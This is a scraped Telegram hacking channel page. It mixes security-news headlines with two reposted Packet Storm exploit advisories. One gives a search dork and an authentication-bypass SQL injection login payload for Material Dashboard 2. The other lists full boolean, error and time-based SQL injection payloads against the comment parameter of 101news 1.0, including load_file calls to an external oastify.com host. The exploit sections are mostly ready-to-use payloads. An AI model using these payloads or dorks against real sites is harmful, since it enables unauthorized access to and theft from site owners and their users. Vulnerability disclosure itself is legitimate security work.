Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Dark Reading: Attacks/Breaches
5 Ways to Survive Scam Season — or Rather, Tax Season

Security pros need to look beyond user education to find and disarm fraudulent actors.
Dark Reading: Attacks/Breaches
Optimizing Cybersecurity Investments in a Constrained Spending Environment

Three ways to stay safe in an economically uncertain 2023.
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —Continue reading on Medium » (https://medium.com/@ramawijayas.techdr7/deserialization-of-untrusted-data-502-edf8a6bb7d4?source=rss------bug_bounty-5)
Even more resources to make you a better hacker
https://thexssrat.medium.com/even-more-resources-to-make-you-a-better-hacker-fbd997c33acd?source=rss------bug_bounty-5

Becoming a “hacker” can mean many different things to different people, so the resources you need to improve will depend on what type of…Continue reading on Medium » (https://thexssrat.medium.com/even-more-resources-to-make-you-a-better-hacker-fbd997c33acd?source=rss------bug_bounty-5)
Bypassing API Restrictions for Fun and Profit

Recently, I downloaded and started testing an application locally which provided dashboard access along with rest API endpoints for it’s…Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Material Dashboard 2 SQL Injection

https://4.bp.blogspot.com/-4IgemuXxvlQ/WWlvJOAjEHI/AAAAAAAAIL4/GJdo6H5fQo4z7HKyurc-fIH3InSyWxX3gCLcBGAs/s1600/h145.png
Material Dashboard version 2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

SHA-256 | 8e3470e914d0f948912ad5bed599f01e55d99eb26c655914c5b63455027dfcc8

Download
====================================================================================================================================
| # Title : Material Dashboard 2 Auth by pass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) |
| # Vendor : https://www.creative-tim.com/ |
| # Dork : "Material Dashboard 2 by Creative Tim" |
====================================================================================================================================
poc :

[+] Dorking İn Google Or Other Search Enggine

[+] Use Payload = user : 'or''='@gmail.com & pass : 'or''='

[+] http://127.0.0.1/kacatalystcom/

Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
|
=======================================================================================================================================

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
101news By Mayuri K 1.0 SQL Injection

https://3.bp.blogspot.com/-8aNXwMYQICE/WWlvIs7ranI/AAAAAAAAILw/f2UnTjqyD14e3ZIoWuyFJjQ7Is9Nz7MtQCLcBGAs/s1600/h144.png
101news By Mayuri K version 1.0 suffers from multiple remote SQL injection vulnerabilities.

SHA-256 | 0aa619446a08f427a388e4aed69d3b3979519cb92cca7f63e154b95937a4c4bf

Download
## Title: 101news-by-Mayuri-K-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 02.02.2023
## Vendor: https://mayurik.com/
## Software: https://mayurik.com/source-code/P4030/news-portal-project-in-php
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `comment` parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+'
was submitted in the comment parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed. This system is absolutely
UNPROTECTED!

STATUS: HIGH Vulnerability

[+]Payload:
```mysql
---
Parameter: comment (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(select
load_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+''
RLIKE (SELECT (CASE WHEN (1140=1140) THEN 0x313637353635+(select
load_file(0x5c5c5c5c316b6d376233693432716b70346d3269793572797068696f62666838357a796e7071646930626f302e6f6173746966792e636f6d5c5c627866))+''
ELSE 0x28 END)) AND 'RBgF'='RBgF&submit=

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(select
load_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+''
AND (SELECT 4135 FROM(SELECT COUNT(*),CONCAT(0x71766b6a71,(SELECT
(ELT(4135=4135,1))),0x7171627071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'iMBs'='iMBs&submit=

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(select
load_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+''
AND (SELECT 1879 FROM (SELECT(SLEEP(3)))AQLB) AND 'asLq'='asLq&submit=
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/101news)

## Proof and Exploit:
[href](https://streamable.com/vrc7x8)

## Time spend:
01:00:00

Source:packetstormsecurity.com